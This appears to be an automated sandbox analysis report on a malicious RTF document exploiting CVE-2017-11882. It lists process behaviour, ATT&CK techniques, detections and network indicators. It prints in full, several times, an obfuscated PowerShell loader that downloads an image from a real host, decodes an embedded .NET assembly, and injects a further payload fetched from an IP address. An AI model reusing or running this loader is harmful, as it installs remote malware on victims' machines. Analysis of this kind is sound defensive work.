    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 780Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2344Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812Thread sleep time: -360000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exe TID: 3180Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3308Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3280Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3424Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-295
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035106C2 mov edx, dword ptr fs:[00000030h]2_2_035106C2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.29 80Jump to behavior
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information211
    Scripting
    Valid Accounts11
    Command and Scripting Interpreter
    211
    Scripting
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts43
    Exploitation for Client Execution
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Modify Registry
    LSASS Memory21
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media23
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
    Process Injection
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Install Root Certificate
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    4YlwTsmpuZ.rtf52%VirustotalBrowse
    4YlwTsmpuZ.rtf50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
    4YlwTsmpuZ.rtf100%AviraHEUR/Rtf.Malformed
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    uploaddeimagens.com.br5%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://crl.entrust.net/server1.crl00%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://secure.comodo.com/CPS00%URL Reputationsafe
    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;0%Avira URL Cloudsafe
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
    http://23.95.235.16/33011/greatideaforfollowers.gif0%Avira URL Cloudsafe
    https://uploaddeimagens.com.br/images/0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
    http://uploaddeimagens.com.br0%Avira URL Cloudsafe
    http://go.micros0%Avira URL Cloudsafe
    http://23.95.235.16/33011/grJ0%Avira URL Cloudsafe
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://uploaddeimagens.com.br/images/3%VirustotalBrowse
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p0%Avira URL Cloudsafe
    https://uploaddeimagens.com.br0%Avira URL Cloudsafe
    http://23.95.235.16/33011/greatideaforfollowers.gifj0%Avira URL Cloudsafe
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    http://23.95.235.16/33011/greatideaforfollowers.gifyyC:0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462350%Avira URL Cloudsafe
    https://uploaddeimagens.com.br6%VirustotalBrowse
    http://uploaddeimagens.com.br5%VirustotalBrowse
    http://23.95.235.10%Avira URL Cloudsafe
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462355%VirustotalBrowse
    http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    uploaddeimagens.com.br
    188.114.96.3
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://23.95.235.16/33011/greatideaforfollowers.giftrue
    • Avira URL Cloud: safe
    unknown
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235true
    • 5%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://ocsp.entrust.net03powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://contoso.com/Licensepowershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/Iconpowershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://uploaddeimagens.com.br/images/powershell.exe, 00000006.00000002.358383867.00000000004D0000.00000004.00000020.00020000.00000000.sdmptrue
    • 3%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://uploaddeimagens.com.brpowershell.exe, 00000006.00000002.358503012.0000000002FAF000.00000004.00000800.00020000.00000000.sdmptrue
    • 5%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://go.microspowershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://23.95.235.16/33011/grJEQNEDT32.EXE, 00000002.00000002.346070197.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000006.00000002.358503012.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235ppowershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://uploaddeimagens.com.brpowershell.exe, 00000006.00000002.358503012.0000000002FA4000.00000004.00000800.00020000.00000000.sdmptrue
    • 6%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://contoso.com/powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://23.95.235.16/33011/greatideaforfollowers.gifjEQNEDT32.EXE, 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://23.95.235.16/33011/greatideaforfollowers.gifyyC:EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.358503012.0000000002481000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://23.95.235.1EQNEDT32.EXE, 00000002.00000002.346070197.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txtwscript.exe, 00000005.00000002.359992594.0000000000677000.00000004.00000020.00020000.00000000.sdmp, greatideaforfollowers.vBS.2.dr, greatideaforfollowers[1].gz.2.drfalse
    • Avira URL Cloud: safe
    unknown
